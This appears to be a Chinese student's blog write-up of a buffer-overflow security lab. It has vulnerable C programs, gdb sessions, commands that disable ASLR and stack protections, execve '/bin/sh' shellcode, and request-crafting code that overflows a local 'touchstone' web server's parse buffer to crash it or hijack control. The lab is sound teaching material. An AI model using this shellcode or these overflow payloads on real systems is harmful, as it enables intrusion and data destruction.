title: buffer-overflow

date: 2016-01-10 14:17:17

categories: information-security

tags: buffer-overflow

  • Excrcise1

    Now, you can write some code. Your job is to print the address of the variable buffer,

    in the C program stack1.c, and compile the C program as above.Run it three times,

    observe and write down the output addresses in address.txt, are these 3 addresses the same or not?

    • 打印首地址 运行3次 每次地址不同
      #include <stdlib.h>
    
  #include <stdio.h>
    
  #include <string.h>
    
  void badman()
    
  {
    
  	printf("I am the bad man\n");
    
  	return;
    
  }
    
  int func(char *str)
    
  {
    
    int variable_a;
    
    char buffer[12];
    
    printf("address:%p\n",buffer);
    
    strcpy(buffer, str);
    
   return 1;
    
  }
    
  int main(int argc, char **argv)
    
    {
    
    char *buf = "hello\n";
    
    if(argc > 1){
    
  	buf = argv[1];
    
    }
    
    func(buf);
    
    printf("Returned Properly\n");
    
    return 1;
    
  }
  • Excrcise2

    Use gdb to debug the program, as the following. You may find the online gdb documentation useful.

    • GDB常见命令
    打开gdb 调试工具:gdb -q
    
(gdb)file stack1 启动待调试程序
    
(gdb)b func 在函数func 处设置断点
    
(gdb)r 运行程序
    
(gdb)i r 查看所有寄存器的值
    
(gdb)x/2s 0xbffff3a0 地址0xbffff3a0 开始读取2 个单元字符串内容
    
(默认4 字节,以下相同)
    
(gdb)p &buffer 打印变量buffer[]首地址
    
(gdb)x/4wx 0xbffff3a0 地址0xbffff3a0 开始读取4 个单元、以4 字
    
节为单位、以16 进制显示内容
    
(gdb)x/8wx $ebp 寄存器ebp 开始读取8 个单元、以4 字节为单位、
    
以16 进制显示内容
    
(gdb)x/2i 0x08048443 查看地址0x08048443 开始2 个单元指令
    
(gdb)disass func 查看函数func 的汇编代码
    
(gdb)q 退出
    • 使用GDB调试示例:
    $ gdb stack1
    
(gdb) b  func
    
Breakpoint 1 at 0x8048412: file stack.c, line 8.
    
(gdb) r
    
Starting program: /tmp/stack1
    
8      strcpy(buffer,str);
    
(gdb) info r
    
eax            0x80484e8    134513896
    
ecx            0xbffff504    -1073744636
    
edx            0xbffff494    -1073744748
    
ebx            0xb7fc8000    -1208188928
    
esp            0xbffff410    0xbffff410
    
ebp            0xbffff438    0xbffff438
    
esi            0x0    0
    
edi            0x0    0
    
eip            0x8048412    0x8048412
    
eflags         0x282    [ SF IF ]
    
cs             0x73    115
    
ss             0x7b    123
    
ds             0x7b    123
    
es             0x7b    123
    
fs             0x0    0
    
gs             0x33    51
    
(gdb) x/2s 0x80484e8
    
0x80484e8:     "I am greater than 12 bytes"
    
0x8048503:     ""
    
(gdb) p &buffer
    
$1 = (char (*)[12]) 0xbffff424
    
(gdb) x/4wx 0xbffff424
    
0xbffff424:    0x08048320    0x00000000    0x080482bd    0xb7fc83e4
    
(gdb) x/8wx $ebp
    
0xbffff438:    0xbffff468    0x08048443    0x080484e8    0xbffff504
    
0xbffff448:    0xbffff50c    0xb7e54225    0xb7fed280    0x00000000
    
(gdb) x/2i 0x08048443
    
0x8048443 :    leave
    
0x8048444 :    ret
    
(gdb) disass func
    
Dump of assembler code for function func:
    
0x0804840c :    push   %ebp
    
0x0804840d :    mov    %esp,%ebp
    
0x0804840f :    sub    $0x28,%esp
    
0x08048412 :    mov    0x8(%ebp),%eax
    
0x08048415 :    mov    %eax,0x4(%esp)
  • Exercise3

    Turn off the address space layout randomization, and then do exercise 1 again,

    write down the three addresses in args.txt, are those three addresses same or not?

    • 关闭地址随机化 多次打印变量缓冲区地址相同
      sysctl -w kernel.randomize_va_space=0
  • Exercise4

    A buffer overflow occurs when data written to a buffer exceeds the length of the buffer,

    so that corrupting data values in memory addresses adjacent the end of the buffer.

    This often occurs when copying data into a buffer without sufficient bounds checking.

    You can refer to Aleph One’s famous article to figure out how buffer overflows work.

    • Now, you run the program stack1, just like below.
      $ ./stack1 aaaaaaaaaa
    
  Returned Properly
    
  $ ./stack1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    
  Segmentation fault

    If you don’t observe Segmentation fault, just increase the number of the input as.

    Here, the message Segmentation fault indicates that your program crashed due to invalid memory access

    (for instance, refer to memory address 0).

  • Exercise4

    Use gdb, to print the value of the register %eip when the program crashes.

    • How does the program run to this address?
    程序执行时传入参数aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    
得出程序崩溃时%eip 的值为0x61
    
由于传入的参数长度超过了buffer 缓冲区的大小,在进行字符
    
串复制的时候,buffer[]不足以容纳传入的字符串aaaaaaaaaaaaaaaaaaa,
    
导致了缓冲区溢出。
  • Exercise5

    The -z execstack option will mark the stack segment executable,

    which you’ll study in detail in lab 2.

    • May you have seen there is a function name badman in the stack1.c,

      but we never use it. Now let’s do a exercise, we’ll invoke it manually.
      $ make stack1
    
  $ gdb stack1 -q
    
  (gdb) b func
    
  Breakpoint 1 at 0x804844a: file stack1.c, line 20.
    
  (gdb) r
    
  Breakpoint 1, func (str=0x8048551 "hello\n") at stack1.c:20
    
  20      strcpy(buffer, str);
    
  (gdb) p badman
    
  $1 = {void ()} 0x804842b <badman>
    
  (gdb) i r $ebp
    
  ebp            0xffffd828    0xffffd828
    
  (gdb) x/wx $ebp+4
    
  0xffffd82c:    0x08048496
    
  (gdb) bt
    
  #0  func (str=0x8048551 "hello\n") at stack1.c:20
    
  #1  0x08048496 in main (argc=1, argv=0xffffd904) at stack1.c:33
    
  (gdb) set *0xffffd82c=0x0804842b
    
  (gdb) c
    
  Continuing.
    
  I am the bad man

  Program received signal SIGSEGV, Segmentation fault.
    
  0x08048556 in ?? ()
    
  (gdb)
    • What is stored in the address 0xFFFFd82c ? 
      存放的是ret 也就是函数func()返回地址
    • Why after change its value to 0x0804842B, the function banman get invoked ? 
      0x0804842b是badman()地址
      
0xffffd82c是func()ret的地址
      
set *0xffffd82c=0x0804842b 强制使func返回的时候进入badman()函数
      
所以导致了函数badman()被调用了
    • Why the Program result s SegmentFault? 
      提示信息:Program received signal SIGSEGV, Segmentation fault.
      
说明了程序执行了无效的内存引用。因为在正常的代码中,没有地方
      
调用函数badman(),所以执行完函数badman()返回时会发生错误。
    • IF we don't want to get a SegmentFault, what we should do ? 
      不出现Segmentation fault 的思路是:保存*(ebp+4),进入函数badman()
      
之后,用保存的*(ebp+4)覆盖此刻的*(ebp+4)的值,这样程序就能顺利进入到main()函数。
  • Exercise6

    • The shellcode we offered can pop up a shell, Now it’s your turn to attack the C program named stack.c

      using shellcode, you will get a shell if you succeed. You should compile and run your program as follows:
      $ make stack2
    
  $ ./stack2
    
  sh-3.2$ id
    
  uid=1000(seed) gid=1000(seed) groups=4(adm),20(dialout),24(cdrom),
    
  46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(seed)
    
  sh-3.2$ exit

    Here, the -fno-stack-protector option will disable gcc’s stack canary.

    Hint: you can use the gdb when necessary, but keep in mind that there are some minor differences between the result from gdb

    and that from the stand-alone executable.

    • 关闭linux内核内存地址随机化
      sysctl –w kernel.randomize_va_space=0
    • 关闭gcc编译器金丝雀
      -fno-stack-protector
    • 关闭堆栈段不可执行
      -z execstack
    • You may look up the Intel Manual to know why the shellcode works.
      #include <stdlib.h>
    
  #include <stdio.h>
    
  #include <string.h>
    
  char shellcode[]=
    
    "\x31\xc0"
    
    "\x50"
    
    "\x68""//sh"
    
    "\x68""/bin"
    
    "\x89\xe3"
    
    "\x50"
    
    "\x53"
    
    "\x89\xe1"
    
    "\x99"
    
    "\xb0\x0b"
    
    "\xcd\x80" ;
    
  // size = 24
    
  int func(char *str)
    
  {
    
    char buffer[128];
    
    int i;
    
    int* ptr=(int*)str;
    
    for(i=6;i<40;i++)//the size of shell code 24 bytes
    
  	*(ptr+i)=(int)buffer;//buffer首地址覆盖func()返回值
    
    strcpy(buffer, str);
    
    return 1;
    
  }
    
  int main(int argc, char**argv)
    
  {
    
    char buffer[1024];
    
    int i;
    
    for(i=0;i<strlen(shellcode);i++)
    
  	buffer[i]=shellcode[i];
    
    func(buffer);
    
    printf("Returned Properly\n");
    
    return 1;
    
  }
  • Exercise7

    All the source code for touchstone is stored in the code repository.

    • Now compile the touchstone web server and deploy it:
      $ make
    
  $ ./touchstone
  • Open your browser to input this URL http://127.0.0.1:8080,

    you will get a simple “hello, world” page.

    Study the web server's code, and look for code vulnerability which can be exploited to crash

    the server by buffer overflows, pay special attention to the file parse.c.

    Write down a description of each vulnerability in the file named bugs.txt.

    • Note:

      For each vulnerability, how you would construct the input (i.e., the HTTP request) to overflow the buffer,

      Locate at least one vulnerabilities. Here is a tutorial of the HTTP protocol,

      you can focus on the GET request.
    • parse.c
      getToken 函数对' '和'\r\n'以外字符直接进行存储,并且都不经过数组边界检查,所以s数
    
  组是很容易溢出的,而且当遇到'\r'时,如果后面没有'\n',输入的字符也会被一概存入s;

  s 数组溢出之后不仅可以修改return address 从而改变程序执行流,而且可以修改参数fd,
    
  比如我们可以将其改为0,那么当getToken 再调用getChar 时,read 函数会去标准输入
    
  读取字符,这样就可以使服务器端程序停住,而客户端浏览器处于”死等“状态。
  • Excrcise8

    • Even though the vulnerability has been detected in the web server, it’s still difficult for you to crash the server,

      because your browser will do most of the dirty work for you that you can not control, that is,

      you can only do good things with such a browser. So, as a hacker, you have to write your own browser from scratch.

    • We have offered you a simple browser in the file browser.c, basically,

      this browser will construct an http request and then send to the web server, waiting for the server’s response.

    • construct an input to send to the touchstone web server

        For the buffer overflow vulnerability you've found,
    
    construct an input to send to the touchstone web server,
    
    your goal is to crash the web server (the http server daemon).
    
    Note: if you're successful to crash the web server,
    
    your browser will remain dead-waiting to receive data from the server.
    
    Don't forget that any valid request must end up with \r\n\r\n.
    • browser.c
      对于以上找到的漏洞,在browser.c 中添加请求字符串,达到crash sever 的目的,
    
  效果是客户端一直处于等待response 的状态。
    
  攻击的关键在于找到返回地址所在的地址,我们可以用gdb 调试的方法找到这个地址,
    
  也可以在parse.c 中输出s 和fd 的地址,
    
  那么ret 就在&fd 这个地址,这里之所以还要找到s 的地址是因为,返回地址的下一个字存放的是fd,
    
  我们如果改变了fd,那么调用getChar 时,read 函数不再是去客户端socket 读取值,
    
  而是根据文件描述符fd 去其它文件读了。

  编写一个无限循环的shellcode,如
    
  while(1);
    
  编译后用objdump 可以查看其机器码,我们可以看到是eb fe,
    
  我们将NOP,shellcode,addr分别填入大小为&fd-s 的数组,
    
  还有一个关键处是我们还要在数组最后加一个' ',这是getToken 函数的出口之一,另一个是'\r\n'.
    
  将shellcode 代码存入缓冲区,在最后一个字节填入' ',具体的代码如下:
    
  	char req[1065];
    
  	int i;
    
  	for(i=0;i<1064;++i)
    
  	req[i] = 0;
    
  	for(i=0;i<strlen(shellcode);++i)
    
  	req[i] = shellcode[i];
    
  	*((int*)(req+1060)) = 0xbffff9e8;//该地址为getToken 的s 数组地址
    
  	req[1064] = ' ';
    
  	write(sock_client,req,1065);
    
  根据找到的另一漏洞,我们可以不用shellcode,达到同样的效果,就是将fd 的内容改为0,
    
  让read 函数等待标准输入,代码如下:
    
  	char req[1069];
    
  	int i;
    
  	for(i=0;i<1068;++i)
    
  	req[i] = 0;
    
  	req[1068] = ' ';
    
  	write(sock_client,req,1069);
  • Excrcise9

    Crashing the web server is just the first step, now you should try to do some thing interesting,

    say, to delete some sensitive files (for example, the grades.txt). To start with,

    you can use the program create-shellcode.c,

    to construct your shellcode, you may have to modify the file according to your need.

    And you can copy your shellcode to the C program test-shell.c.

    • delete grades.txt
      Perform your attack by constructing an exploit that hijacks control flow of the web server
    
  and unlink (delete) grades.txt.
    
  Remember that the web server is on your computer,
    
  so you should create a file named grades.txt first.

信息安全实验一:buffer-overflow的更多相关文章

  1. SEED信息安全实验系列:缓冲区溢出漏洞实验

    缓冲区溢出漏洞实验 本课程详细出自http://www.shiyanlou.com/courses/231,转载请注明出处. 一.实验描述 缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情 ...

  2. 科软-信息安全实验1-ICMP重定向

    目录 一 前言 二 Talk is cheap, show me the code 三 效果演示 四 遇到的问题&解决 一 前言 文章不讲解理论知识哈,想学习理论知识的,认真听课

  3. ubuntu 14.04 ns2.35 ***buffer overflow detected **: ns terminated解决办法

    1.按照如下教程安装 Install With Me !: How to Install NS-2.35 in Ubuntu-13.10 / 14.04 (in 4 easy steps) 2.运行一 ...

  4. Kingsoft Office Writer 2012 8.1.0.3385 - (.wps) Buffer Overflow Exploit (SEH)

    #!/usr/bin/python # Exploit Title: Kingsoft Office Writer v2012 8.1.0.3385 .wps Buffer Overflow Expl ...

  5. ORA-20000:ORU-10027:buffer overflow,limit of 2000 bytes.

     ORA-20000:ORU-10027:buffer overflow,limit of 2000 bytes.  这是因为在过程中用到了dbms_output.put_line()在服务器端输出信 ...

  6. Buffer Overflow Study

    -- These days I learned and studied buffer overflow. I like to write on the paper and it can keep sy ...

  7. buffer overflow

    Computer Systems A Programmer's Perspective Second Edition We have seen that C does not perform any ...

  8. buffer overflow vulnerabilitie

    Computer Systems A Programmer's Perspective Second Edition Avoiding security holes.For many years,bu ...

  9. 信息安全实验二:return-to-libc

    title: return-to-libc date: 2016-01-11 17:40:30 categories: information-security tags: return-to-lib ...

随机推荐

  1. 【转】Android 基于google Zxing实现二维码、条形码扫描,仿微信二维码扫描效果--不错

    原文网址:http://blog.csdn.net/xiaanming/article/details/10163203 转载请注明出处:http://blog.csdn.net/xiaanming/ ...

  2. Hadoop操作hdfs的命令【转载】

    本文系转载,原文地址被黑了,故无法贴出原始链接. Hadoop操作HDFS命令如下所示: hadoop fs 查看Hadoop HDFS支持的所有命令 hadoop fs –ls 列出目录及文件信息 ...

  3. 《SDN核心技术剖析和实战指南》2.4 OVS交换机实现分析小结

    Open vSwitch(OVS)是一款基于软件实现的开源交换机.它能够支持多种标准的管理接口和协议以及跨多个物理服务器的分布式环境.特别地,OVS提供了对OpenFlow协议的支持,并且能够与众多开 ...

  4. Jenkins配置Java项目1(Java+Maven+Tomcat)

    先收集几个网址,后续再自己动手过一遍 http://www.cnblogs.com/sunzhenchao/archive/2013/01/30/2883289.html https://my.osc ...

  5. [week4]每周总结与工作计划

    计算机网络 TAT 小白dp 28号还有一场 背单词 背马克思 python目标80% 熟悉coursera c++模版和 仿函数 人文修养 开学数据库,itercast的sql*2 itercast ...

  6. [RxJS] Creation operators: empty, never, throw

    This lesson introduces operators empty(), never(), and throw(), which despite being plain and void o ...

  7. shell 死循环

      例1: 运行脚本后会自动加载firefox浏览器,并打开指定网页.如果用户关闭firefox,脚本会再次自动重新打开firefox.     如需结束循环,中止t2.sh进程即可.注意不要同时执行 ...

  8. ios10下,手机连接xcode控制台不显示日志,解决办法

    按照下面设置: run- > environment variables->添加 OS_ACTIVITY_MODE ,value内容为空

  9. PLSQL编程基础

    一 PL/SQL简介 1 SQL:结构化的查询语句 2 PL/SQL优点与特性: 提高运行效率==>>提高运行效率的其他方式(存储过程,分页,缓存,索引) 模块化设计 允许定义标识符(变量 ...

  10. (转)html5 Placeholder属性兼容IE6、7方法

    使低版本浏览器支持Placeholder有很多方法,都不是很完美,或多或少有点问题,且有些原生支持的浏览器在获得焦点时会清空Placeholder提示.发现zhihu的解决方法不错,特记录下 wind ...